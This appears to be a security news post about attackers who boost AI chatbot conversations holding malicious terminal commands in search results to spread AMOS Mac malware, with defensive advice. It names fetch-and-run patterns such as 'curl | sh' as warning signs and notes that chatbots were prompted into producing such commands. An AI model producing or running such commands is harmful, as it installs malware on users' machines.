Hackers seed search results with AI‑generated commands that install malware — the AMOS case and how to protect yourself
Security firm Huntress has flagged a worrying new social‑engineering tactic: attackers use AI assistants to craft dangerous terminal commands, publish the chat publicly, then pay to boost that page in Google search results. Unsuspecting users searching for how‑to instructions may follow the copy‑paste command and unknowingly install malware such as AMOS.
The attack chain is simple but effective. An attacker prompts a chatbot (Huntress tested ChatGPT and Grok) to generate a shell command for a common task — for example, “clear disk space on Mac” — posts the conversation publicly, and sponsors or boosts the link so it ranks for the query. When a user clicks the result and pastes the command into their terminal, the machine executes the malicious payload.
Why this is especially dangerous
- No download, no attachment: the victim runs a command directly — traditional phishing red flags are often absent.
- Source trust: high‑ranking search results and outputs from well‑known chatbots create misplaced trust.
- Rapid spread: boosted pages can appear at the top of search results quickly, exposing many users before removal.
Practical safety steps
- Don’t paste commands you don’t understand. Break commands into parts and research each token or flag before running them.
- Verify sources. Prefer official documentation, vendor knowledge bases, GitHub, or established community threads (Stack Overflow) over random boosted pages or chat logs.
- Test in a sandbox. Use a disposable VM or container to run unfamiliar commands first, isolated from your primary system and data.
- Inspect scripts before execution. Open copied scripts in a text editor and look for obfuscated chains like curl | sh or wget | bash, which can hide remote payloads.
- Harden systems and back up. Keep backups, enable disk encryption and anti‑malware, and limit administrative access on daily accounts.
What Huntress discovered
Huntress traced a Mac‑targeting data‑exfiltration campaign (AMOS) back to a search result promoting a malicious ChatGPT conversation. The boosted link stayed indexed for hours before removal, demonstrating how quickly this vector can reach victims. Their tests showed that multiple chatbots could reproduce the malicious commands when prompted.
Implications
This technique highlights the need for caution when following instructions from search results or conversational AI. As attackers adapt, defenders should combine user education, better search and AI safety practices, and platform responses (e.g., rapid takedown of malicious boosted content).
Further reading: Huntress analysis · Engadget coverage.
Discussion: Have you ever pasted a command you later regretted? What practices or tools help you verify terminal commands before running them?
